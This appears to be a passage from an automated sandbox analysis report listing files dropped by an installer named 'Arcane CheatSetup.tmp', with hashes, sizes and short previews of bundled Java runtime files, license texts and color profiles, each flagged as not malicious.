                                Entropy (8bit):6.019927381236816
                                Encrypted:false
                                SSDEEP:3072:9vFy5zbJEQFFB9AYeb11tzTQrTBfYEaf9zQ6NlUlh5:7iFry3b11twTBgEaf9zQ6Nc
                                MD5:C15F0FE651B05F4288CBC3672F6DC3CE
                                SHA1:FFCE84FE532B41F31CDDC41C84024FAFE6BC30E6
                                SHA-256:869DC4D40444F10325057B0CC3BB7EA48942DD712DF8A1AE331A554FF0397F1A
                                SHA-512:E9E27C4C68972E3250B380C1A5D5EB02BEC03028D389234A44A7D56974BFA233D177173F929BDB6FF877AE17A529D85D384684B0037E260A0143F7A95A0204C6
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):39488
                                Entropy (8bit):6.751057397220933
                                Encrypted:false
                                SSDEEP:768:Okt1MVMrA9/Klzwz9UyCgMUt9onPs3h3nVt83OndMY7dmMpAnC70N:Oo1oMQ/CrPa3VWO+gdmMW6q
                                MD5:DE2167A880207BBF7464BCD1F8BC8657
                                SHA1:0FF7A5EA29C0364A1162A090DFFC13D29BC3D3C7
                                SHA-256:FD856EA783AD60215CE2F920FCB6BB4E416562D3C037C06D047F1EC103CD10B3
                                SHA-512:BB83377C5CFF6117CEC6FBADF6D40989CE1EE3F37E4CEBA17562A59EA903D8962091146E2AA5CC44CFDDDF280DA7928001EEA98ABF0C0942D69819B2433F1322
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.4868701533420925
                                Encrypted:false
                                SSDEEP:384:uVI9/tEAHVvfiqiW9LEiGTHb6hVXbS7fLsD5bGGNET7T7T7T7JyFoynPV5hgGLVt:uVI9/yA9f1iW9LEiGTHb6hVXbS7QbGG9
                                MD5:7C2959F705B5493A9701FFD9119C5EFD
                                SHA1:5A52D57D1B96449C2B40A82F48DE2419ACA944C3
                                SHA-256:596F89E7E5D9AC2B1F97FA36A20A7405C1CC41A9FCBA96DB089ADA4550131B24
                                SHA-512:B7B48BD14701F75B9018BEDEE5A4CFCEBDAC342F83339FB3F1EFB7855598474C9D1CC993B5D4ADD3326140435087D2BD7CBBC18BC76C64EAD6234A9A7D57C552
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):163904
                                Entropy (8bit):6.508553433039132
                                Encrypted:false
                                SSDEEP:3072:onzJtwzsrYx6cY+90AiVrM5muIqltkt7maRoM/X1fJqO0NJT:onttwzsrYxTaVVY5muIq3mx/X1fcb
                                MD5:A63387A1BFDF760575B04B7BFD57FF89
                                SHA1:9384247599523D97F40B973A00EE536848B1D76F
                                SHA-256:5DF5B7E6EFCC345DDC8448AFC707B666F5F696F554B00ACA64D8E23EDBC176BF
                                SHA-512:CB3A6A394424345FFA076E0BE58F284A0E4DB6FBFCE02D93FB4871D350A7FA1E673175AE988C26453DB1C983C0D06A01DD413DE47031BB4BF308CAAF3513C36F
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):69696
                                Entropy (8bit):6.89860109289213
                                Encrypted:false
                                SSDEEP:1536:ZCghp1EJqcGdjandlraksIOwIOpVnToIft4tpgO6:/142jUhimp9TBft4tqO6
                                MD5:CB99B83BBC19CD0E1C2EC6031D0A80BC
                                SHA1:927E1E24FD19F9CA8B5191EF3CC746B74AB68BCD
                                SHA-256:68148243E3A03A3A1AAF4637F054993CB174C04F6BD77894FE84D74AF5833BEC
                                SHA-512:29C4978FA56F15025355CE26A52BDF8197B8D8073A441425DF3DFC93C7D80D36755CC05B6485DD2E1F168DF2941315F883960B81368E742C4EA8E69DD82FA2BA
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (427), with CRLF line terminators
                                Category:dropped
                                Size (bytes):533
                                Entropy (8bit):5.416086012521588
                                Encrypted:false
                                SSDEEP:12:GEKkc58IOlBVAQEjy2IM0oPP1RVtc8fFVKeiIdGIVIPJvq1RUbDcz:GEK7586QY/0oPtRb2TqySRUkz
                                MD5:A61B1E3FE507D37F0D2F3ADD5AC691E0
                                SHA1:8AE1050FF466B8F024EED5BC067B87784F19A848
                                SHA-256:F9E84B54CF0D8CB0645E0D89BF47ED74C88AF98AC5BF9CCF3ACCB1A824F7DC3A
                                SHA-512:3E88A839E44241AE642D0F9B7000D80BE7CF4BD003A9E2F9F04A4FEB61EC4877B2B4E76151503184F4B9978894BA1D0DE034DBC5F2E51C31B3ABB24F0EACF0C7
                                Malicious:false
                                Preview:JAVA_VERSION="1.8.0_101"..OS_NAME="Windows"..OS_VERSION="5.1"..OS_ARCH="i586"..SOURCE=" .:e983a19c6439 corba:2bb2aec4b3e5 deploy:2390a2618e98 hotspot:77df35b662ed hotspot/make/closed:40ee8a558775 hotspot/src/closed:710cffeb3c01 hotspot/test/closed:d6cfbcb20a1e install:68eb511e9151 jaxp:8ee36eca2124 jaxws:287f9e9d45cc jdk:827b2350d7f8 jdk/make/closed:53a5d48a69b0 jdk/src/closed:06c649fef4a8 jdk/test/closed:556c76f337b9 langtools:8dc8f71216bf nashorn:44e4e6cbe15b pubs:388b7b93b2c0 sponsors:1b72bbdb30d6"..BUILD_TYPE="commercial"..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ISO-8859 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3313
                                Entropy (8bit):4.557128068430301
                                Encrypted:false
                                SSDEEP:96:a58tiSm9iicC7CRRS9i7cq11iUDcsMLks0h9n:WOi59rcF/Cigq11iUD5MLks0z
                                MD5:FC605D978E7825595D752DF2EF03F8AF
                                SHA1:C493C9541CAAEE4BFE3B3E48913FD9DF7809299F
                                SHA-256:7D697EAA9ACF50FE0B57639B3C62FF02916DA184F191944F49ECA93D0BB3374F
                                SHA-512:FB811DE6A2B36B28CA904224EA3525124BD4628CA9618C70EB9234AB231A09C1B1F28D9B6301581A4FA2E20F1036D5E1C3D6F1BF316C7FE78EF6EDEAE50EA40E
                                Malicious:false
                                Preview:Copyright . 1993, 2016, Oracle and/or its affiliates...All rights reserved.....This software and related documentation are provided under a..license agreement containing restrictions on use and..disclosure and are protected by intellectual property laws...Except as expressly permitted in your license agreement or..allowed by law, you may not use, copy, reproduce, translate,..broadcast, modify, license, transmit, distribute, exhibit,..perform, publish, or display any part, in any form, or by..any means. Reverse engineering, disassembly, or..decompilation of this software, unless required by law for..interoperability, is prohibited.....The information contained herein is subject to change..without notice and is not warranted to be error-free. If you..find any errors, please report them to us in writing.....If this is software or related documentation that is..delivered to the U.S. Government or anyone licensing it on..behalf of the U.S. Government, the following notice is..applicable:...
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):111645
                                Entropy (8bit):4.8590909329531025
                                Encrypted:false
                                SSDEEP:1536:iiVRF8bLuepEvc5O5YwT3JJ4WOHHA/AFjrlHyEepdfZ9JIH4gDq:dRMiCOjJJ4pg/0Hx9MlZ9KH47
                                MD5:0E05BD8B9BFCF17F142445D1F8C6561C
                                SHA1:CF0A9F4040603008891AA0731ABF89CE2403F2FB
                                SHA-256:C3EA3996241B8E9AE7DB3780E470174076FD2003D8AEFAA77BF0BAB5E04DE050
                                SHA-512:07C7865D31D22BA0C68E384AFEDC22261F7B3A82BEBC9324145FF7F631623ECA2DC31C71CDBBFC9FEBC1733451A095302DE2A0877821A5B68038E350969BF460
                                Malicious:false
                                Preview:.DO NOT TRANSLATE OR LOCALIZE....***************************************************************************....%%The following software may be included in this product:..Microsoft DirectShow - Base Classes....Use of any of this software is governed by the terms of the license below:....MSDN - Information on Terms of Use....Updated: February 13, 2008....ON THIS PAGE.... * ACCEPTANCE OF TERMS.. * PRIVACY AND PROTECTION OF PERSONAL INFORMATION.. * NOTICE SPECIFIC TO APIs AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO SOFTWARE AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO DOCUMENTATION AVAILABLE ON THIS WEB SITE.. * NOTICES REGARDING SOFTWARE, DOCUMENTATION, APIS AND SERVICES AVAILABLE ON..THIS WEB SITE.. * RESERVATION OF RIGHTS.. * MEMBER ACCOUNT, PASSWORD, AND SECURITY.. * NO UNLAWFUL OR PROHIBITED USE.. * USE OF SERVICES.. * MATERIALS PROVIDED TO MICROSOFT OR POSTED AT ANY MICROSOFT WEB SITE.. * NOTICES AND PROCEDURE FOR MAKING CLAIMS OF COP
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:HTML document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):983
                                Entropy (8bit):5.135635144562017
                                Encrypted:false
                                SSDEEP:24:+STATDcxWpAVjXQ5cjaJ2gjQo4OSED6R8R/TtDpM:+STATD7pqjXBeJdso4OnxRc
                                MD5:3CB773CB396842A7A43AD4868A23ABE5
                                SHA1:ACE737F039535C817D867281190CA12F8B4D4B75
                                SHA-256:F450AEE7E8FE14512D5A4B445AA5973E202F9ED1E122A8843E4DC2D4421015F0
                                SHA-512:6058103B7446B61613071C639581F51718C12A9E7B6ABD3CF3047A3093C2E54B2D9674FAF9443570A3BB141F839E03067301FF35422EB9097BD08020E0DD08A4
                                Malicious:false
                                Preview:<html>..<head>..<title>..Welcome to the Java(TM) Platform..</title>..</head>..<body>....<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>..<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime .. Environment. This provides complete runtime support for Java applications. ..<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> .. Plug-in product which supports the Java environment inside web browsers. ..<h3>References</h3>..<p>..See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product..documentation for more information on using the Java Plug-in product...<p> See the <a href=.."http://www.oracle.com/technetwork/java/javase/overview/"..>Java Platform</a> web site for .. more information on the Java Platform. ..<hr>..<font size="-2">..Copyright (c) 2006, 2016, Oracle and/or its affiliates. All rights reserved...</font>..<p>..</body>..</html>..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.271470906740504
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkv:c9hzhgkv
                                MD5:67CB88F6234B6A1F2320A23B197FA3F6
                                SHA1:877ACEBA17B28CFFF3F5DF664E03B319F23767A1
                                SHA-256:263E21F4B43C118A8B4C07F1A8ACB11CAFC232886834433E34187F5663242360
                                SHA-512:4D43E5EDECAB92CEBD853204C941327DCCBFD071A71F066C12F7FB2F1B2DEF59C37A15CE05C4FE06EC2EA296B8630C4E938254A8A92E149E4A0A82C4307D648F
                                Malicious:false
                                Preview:Please refer to http://java.com/license..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):4.2563005536211715
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkjn:c9hzhgkjn
                                MD5:4BDA1F1B04053DCFE66E87A77B307BB1
                                SHA1:B8B35584BE24BE3A8E1160F97B97B2226B38FA7D
                                SHA-256:FD475B1619675B9FB3F5CD11D448B97EDDEE8D1F6DDCCA13DED8BC6E0CAA9CF3
                                SHA-512:997CEE676018076E9E4E94D61EC94D5B69B148B3152A0148E70D0BE959533A13AD0BC1E8B43268F91DB08B881BF5050A6D5C157D456597260A2B332A48068980
                                Malicious:false
                                Preview:Please refer to http://java.com/licensereadme..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):180668
                                Entropy (8bit):5.064180003233063
                                Encrypted:false
                                SSDEEP:3072:54ct+BcF1N7m8arf1kHRSusX2NyJ9KH4PF4j52eTjLAzE7GzmCK+XNhalQxkM8QB:N7mtrf1GhMF4j5RMGQoyzaXmR
                                MD5:0E87879F452892B85C81071A1DDD5A2A
                                SHA1:2CF97C1A84374A6FBBD5D97FE1B432FA799C3B19
                                SHA-256:9C18836FD0B5E4B0C57CFFDB74574FA5549085C3B327703DC8EFE4208F4E3321
                                SHA-512:10BA68FFD9DEAB10A0B200707C3AF9E95E27AED004F66F049D41310CB041B7618EE017219C848912D5951599208D385BCB928DD33175652101C7E5BC2E3EBA5B
                                Malicious:false
                                Preview:DO NOT TRANSLATE OR LOCALIZE...-----------------------------....%% This notice is provided with respect to ASM Bytecode Manipulation ..Framework v5.0.3, which may be included with JRE 8, and JDK 8, and ..OpenJDK 8.....--- begin of LICENSE ---....Copyright (c) 2000-2011 France T.l.com..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holders nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):155
                                Entropy (8bit):4.618267268558291
                                Encrypted:false
                                SSDEEP:3:nSkoZgZLXnuWxVEsTwVAAiuKIn7IRAdSPGGzJ0vwQAnfMaAHCRyvy:nBcAPWEwVAkIiSPhwwpkaAHCIa
                                MD5:9E5E954BC0E625A69A0A430E80DCF724
                                SHA1:C29C1F37A2148B50A343DB1A4AA9EB0512F80749
                                SHA-256:A46372B05CE9F40F5D5A775C90D7AA60687CD91AAA7374C499F0221229BF344E
                                SHA-512:18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
                                Malicious:false
                                Preview:#..# Load the Java Access Bridge class into the JVM..#..#assistive_technologies=com.sun.java.accessibility.AccessBridge..#screen_magnifier_present=true....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1438
                                Entropy (8bit):5.214662998532387
                                Encrypted:false
                                SSDEEP:24:QVDpdQYHLOVhl86bePCkHUMCLC9TFcgg+DR+Oby:MQ4LOVh2WGfUMCLC9Zcgg2Ru
                                MD5:92BA2D87915E6F7F58D43344DF07E1A6
                                SHA1:872BC54E53377AAC7C7616196BCCE1DB6A3F0477
                                SHA-256:68F0CF30429A42A6FE78B1DE91970E5C78FD03D1599BEB080C1C196D5C59E4C0
                                SHA-512:A964E2CEB4D601FAF28ECF13FB11777B70708C21CF9EA23721E462B6E911051108B8A42EBF6447FA49CB61D7FA2D79475F50EE791F1121616371E2B02FAB71B6
                                Malicious:false
                                Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..# Japanese imperial calendar..#..# Meiji since 1868-01-01 00:00:00 local time (Gregorian)..# Taisho since 1912-07-30 00:00:00 local time (Gregorian)..# Showa since 1926-12-25 00:00:00 local time (Gregorian)..# Heisei since 1989-01-08 00:00:00 local time (Gregorian)..calendar.japanese.type: LocalGregorianCalendar..calendar.japanese.eras: \...name=Meiji,abbr=M,since=-3218832000000; \...name=Taisho,abbr=T,since=-1812153600000; \...name=Showa,abbr=S,since=-1357603200000; \...name=Heisei,abbr=H,since=600220800000....#..# Taiwanese calendar..# Minguo since 1911-01-01 00:00:00 local time (Gregorian)..calendar.taiwanese.type: LocalGregorianCalendar..calendar.taiwanese.eras: \...name=MinGuo,since=-1830384000000....#..# Thai Buddhist calendar..# Buddhist Era since -5
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3091908
                                Entropy (8bit):6.633254981822853
                                Encrypted:false
                                SSDEEP:49152:puZi4j4TQkgaSOHEhjy2twRYEc1sJzlbguMuD:puZiW4smxGocuJlbgq
                                MD5:0B3923ABB0D48FDAE7A2306717967B39
                                SHA1:0882294FFEC2769023AA36FF9CC53562F8E26020
                                SHA-256:E88AEC2A49F07CAC9471D9E4C113FA189600B57245685814D043C20EA8A8B471
                                SHA-512:CF622081B290140CE8419B30FB25442F7204C9A37E1490030A4D656F66C509946F48C50CC7794DA51007EFB202805605FE3C2AC3534D63FBF928EA35CE16A040
                                Malicious:false
                                Preview:PK........s..H................META-INF/....PK........s..H<:S1D...D.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_07 (Oracle Corporation)....PK...........HUi..............sun/nio/cs/ext/Big5.class.......4."..........t....t............................................................................................................................................................................................................................................................................................................................................................................~.........b2cSBStr...Ljava/lang/String;...ConstantValue...b2cStr...[Ljava/lang/String;...b2c...[[C...b2cSB...[C...b2cInitialized...Z...c2b...c2bIndex...c2bInitialized...<init>...()V...Code...LineNumberTable...historicalName...()Ljava/lang/String;...contains...(Ljava/nio/charset/Charset;)Z...StackMapTable...newDecoder..#()Ljava/nio/charset/CharsetDecoder;...newEncoder..#()Ljava/nio/charset/Ch
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):84355
                                Entropy (8bit):4.927199323446014
                                Encrypted:false
                                SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                MD5:7FC71A62D85CCF12996680A4080AA44E
                                SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                Malicious:false
                                Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
                                Category:dropped
                                Size (bytes):51236
                                Entropy (8bit):7.226972359973779
                                Encrypted:false
                                SSDEEP:1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
                                MD5:10F23396E21454E6BDFB0DB2D124DB85
                                SHA1:B7779924C70554647B87C2A86159CA7781E929F8
                                SHA-256:207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
                                SHA-512:F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
                                Category:dropped
                                Size (bytes):632
                                Entropy (8bit):3.7843698642539243
                                Encrypted:false
                                SSDEEP:12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
                                MD5:1002F18FC4916F83E0FC7E33DCC1FA09
                                SHA1:27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
                                SHA-256:081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
                                SHA-512:334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
                                Malicious:false
                                Preview:...xKCMS....mntrGRAYXYZ ._..........acspSUNW....KODAGRAY.......................+....................................................cprt.......?desc........dmnd.......`wtpt........kTRC........dmdd.......dtext....COPYRIGHT (c) 1997 Eastman Kodak, All rights reserved...desc.......'KODAK Grayscale Conversion - Gamma 1.0..................@...............~.......................~.......~..............desc........KODAK..................@..................................................,...,....XYZ ...............+curv............desc........Grayscale..................@..................................................,...,....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
                                Category:dropped
                                Size (bytes):1044
                                Entropy (8bit):6.510788634170065
                                Encrypted:false
                                SSDEEP:6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
                                MD5:A387B65159C9887265BABDEF9CA8DAE5
                                SHA1:7913274C2F73BAFCF888F09FF60990B100214EDE
                                SHA-256:712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
                                SHA-512:359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
                                Malicious:false
                                Preview:....KCMS....mntrRGB XYZ ............acsp........KODK...........................,KODK................................................cprt.......Hdesc...8....rXYZ........gXYZ........bXYZ........rTRC........gTRC........bTRC........wtpt........text....Copyright (c) Eastman Kodak Company, 1998, all rights reserved..desc........linear sRGB............l.i.n.e.a.r. .s.R.G.B.....linear sRGB........................................................XYZ ......m...6.....XYZ ......e........!XYZ ......#B...^...Kcurv........................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..........................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
                                Category:dropped
                                Size (bytes):274474
                                Entropy (8bit):7.843290819622709
                                Encrypted:false
                                SSDEEP:6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
                                MD5:24B9DEE2469F9CC8EC39D5BDB3901500
                                SHA1:4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
                                SHA-256:48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
                                SHA-512:D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
                                Category:dropped
                                Size (bytes):3144
                                Entropy (8bit):7.026867070945169
                                Encrypted:false
                                SSDEEP:48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
                                MD5:1D3FDA2EDB4A89AB60A23C5F7C7D81DD
                                SHA1:9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
                                SHA-256:2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
                                SHA-512:16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
                                Malicious:false
                                Preview:...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................view.........._.....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5824
                                Entropy (8bit):5.074440246603207
                                Encrypted:false
                                SSDEEP:96:6M5VfH+uEMmPDkZeujdJfZUB8BB/+PhPXsOQ71GAXf5lZuU1EbWF7Ycx/AQ12a8T:6M6p4ZeWd1ZUB8BBGPhPXsOQ71GAXBly
                                MD5:95AE170D90764B3F5E68C72E8C518DDC
                                SHA1:1939B699D16A5DB3E3F905466222099D7C29285A
                                SHA-256:A2B31E9CBCEAB296A5E1CF056EFD953CED23B888CD929B0BBE6EB6B53D2BF861
                                SHA-512:87E970BEAC8141C757D622FC8B6D84FE173EA4B134AFD8E2F979714C1110C3D92F3CE5F2B9DC74804DD37D13AB2A0EDF0FCA242F61CF8ED065AE81B7331F8816
                                Malicious:false
                                Preview:#sun.net.www MIME content-types table..#..# Property fields:..#..# <description> ::= 'description' '=' <descriptive string>..# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>..# <image> ::= 'icon' '=' <filename of icon image>..# <action> ::= 'browser' | 'application' | 'save' | 'unknown'..# <application> ::= 'application' '=' <command line template>..#....#..# The "we don't know anything about this data" type(s)...# Used internally to mark unrecognized types...#..content/unknown: description=Unknown Content..unknown/unknown: description=Unknown Data Type....#..# The template we should use for temporary files when launching an application..# to view a document of given type...#..temp.file.template: c:\\temp\\%s....#..# The "real" types...#..application/octet-stream: \...description=Generic Binary Stream;\...file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz....application/oda: \...description=ODA Document;\...file_extens
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):4122
                                Entropy (8bit):3.2585384283455134
                                Encrypted:false
                                SSDEEP:48:BlWxFFGFSupi94blATFxjGph5vLC6/w37ZXQTbVm/eVzOBJ:BlWJEi94blAT+ph5vLkApmGqr
                                MD5:F6258230B51220609A60AA6BA70D68F3
                                SHA1:B5B95DD1DDCD3A433DB14976E3B7F92664043536
                                SHA-256:22458853DA2415F7775652A7F57BB6665F83A9AE9FB8BD3CF05E29AAC24C8441
                                SHA-512:B2DFCFDEBF9596F2BB05F021A24335F1EB2A094DCA02B2D7DD1B7C871D5EECDA7D50DA7943B9F85EDB5E92D9BE6B6ADFD24673CE816DF3960E4D68C7F894563F
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2282861
